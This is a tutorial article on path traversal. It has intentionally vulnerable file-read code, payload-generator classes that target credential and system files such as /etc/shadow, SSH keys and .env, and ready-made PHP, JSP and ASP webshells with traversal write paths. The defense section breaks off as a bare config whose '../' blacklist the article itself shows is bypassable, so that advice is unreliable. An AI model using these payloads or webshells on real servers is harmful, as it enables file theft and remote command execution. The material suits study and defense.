Published: 2025-03-23 13:26
# Path Traversal Vulnerabilities in Practice

## How the Vulnerability Works

Path traversal is a common web security vulnerability in which an attacker manipulates a file path to access arbitrary files on the server. The root cause is always the same: user-controlled input reaches a filesystem call without being confined to the directory the application intended. This article walks through how the vulnerability arises, how it is exploited, and how to defend against it.

## Vulnerability Types

### 1. Basic path traversal

```javascript
const fs = require('fs');

// Unsafe file read
function readFile(filename) {
  const basePath = '/var/www/uploads/';
  const filePath = basePath + filename;
  // The path is concatenated directly, with no validation at all
  return fs.readFileSync(filePath);
}

// An attacker can pass ../../../etc/passwd
// to read sensitive system files
```

### 2. Encoding bypass

```python
import os

# Incomplete path validation
def get_file(filename):
    # Only checks whether the name contains ../
    if '../' in filename:
        return 'Invalid filename'
    path = os.path.join('/var/www/files', filename)
    return open(path).read()

# An attacker can bypass the check with:
# %2e%2e%2f = ../
# ..%2f     = ../
# %2e%2e/   = ../
```

### 3. Normalization bypass

```php
// Unsafe path validation
function getImage($filename) {
    $path = realpath('/images/' . $filename);
    if (strpos($path, '/images/') === 0) {
        return file_get_contents($path);
    }
    return false;
}

// An attacker can bypass the check with a symbolic link
// or with special character sequences
```

## Attack Techniques

### 1. Directory traversal

```javascript
// Directory traversal tool
class DirectoryTraversal {
  constructor() {
    this.payloads = [
      '../',
      '..\\',
      '%2e%2e%2f',
      '..;/',
      '.../'
    ];
    this.targets = [
      'etc/passwd',
      'etc/shadow',
      'windows/win.ini',
      'boot.ini'
    ];
  }

  // Generate attack paths
  generatePaths(depth = 3) {
    const paths = [];
    for (const payload of this.payloads) {
      for (const target of this.targets) {
        // Generate paths of different depth
        let path = '';
        for (let i = 0; i < depth; i++) {
          path += payload;
        }
        paths.push(path + target);
      }
    }
    return paths;
  }

  // Percent-encode every character of the path
  encodePath(path) {
    return path
      .split('')
      .map(c => '%' + c.charCodeAt(0).toString(16))
      .join('');
  }

  // Double-encode the path
  doubleEncodePath(path) {
    return this.encodePath(this.encodePath(path));
  }
}
```

### 2. File read

```python
import urllib.parse

# File read tool
class FileReader:
    def __init__(self):
        self.sensitive_files = {
            'unix': [
                '/etc/passwd',
                '/etc/shadow',
                '/etc/hosts',
                '~/.bash_history',
                '~/.ssh/id_rsa'
            ],
            'windows': [
                'c:\\boot.ini',
                'c:\\windows\\system32\\drivers\\etc\\hosts',
                'c:\\windows\\repair\\sam',
                'c:\\windows\\php.ini',
                'c:\\windows\\my.ini'
            ],
            'web': [
                'config.php',
                '.env',
                'wp-config.php',
                'web.config',
                'database.yml'
            ]
        }

    def generate_payloads(self, file_type):
        if file_type not in self.sensitive_files:
            return []
        payloads = []
        files = self.sensitive_files[file_type]
        # Generate different forms of each path
        for file in files:
            payloads.extend([
                file,
                self.normalize_path(file),
                self.encode_path(file),
                self.double_encode_path(file)
            ])
        return payloads

    def normalize_path(self, path):
        # Convert path separators
        return path.replace('\\', '/')

    def encode_path(self, path):
        # URL-encode the path
        return urllib.parse.quote(path)

    def double_encode_path(self, path):
        # Double URL-encode the path
        return urllib.parse.quote(
            urllib.parse.quote(path)
        )
```

### 3. File write

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// File write exploitation
public class FileWriter {
    private Map<String, String> webshells;

    public FileWriter() {
        webshells = new HashMap<>();
        // PHP webshell
        webshells.put(
            "php",
            "<?php system($_GET['cmd']); ?>"
        );
        // JSP webshell
        webshells.put(
            "jsp",
            "<% Runtime.getRuntime().exec( request.getParameter(\"cmd\") ); %>"
        );
        // ASP webshell
        webshells.put(
            "asp",
            "<% Set rs = CreateObject( \"WScript.Shell\" ) rs.Run(Request(\"cmd\")) %>"
        );
    }

    // Generate write paths
    public List<String> generatePaths(
        String webroot,
        String type
    ) {
        List<String> paths = new ArrayList<>();
        // Common web directories
        String[] dirs = {
            "images", "uploads", "temp", "assets", "public"
        };
        // Build a path for each directory
        for (String dir : dirs) {
            paths.add(String.format(
                "%s/%s/shell.%s", webroot, dir, type
            ));
            // Add a path traversal variant
            paths.add(String.format(
                "%s/%s/../shell.%s", webroot, dir, type
            ));
        }
        return paths;
    }

    // Get the webshell content
    public String getWebshell(String type) {
        return webshells.getOrDefault(
            type.toLowerCase(), ""
        );
    }
}
```

## Defenses

### 1. Path validation

```javascript
// Path validator
class PathValidator {
  constructor() {
    this.config = {
      // Permitted root directory
      basePath: '/var/www/uploads',
      // Permitted file types
      allowedExts: new Set([
        'jpg', 'png', 'gif', 'pdf'
      ]),
      // Forbidden path patterns
      blacklist: [
        '../',
        '..\\'
      ]
    };
  }
}
```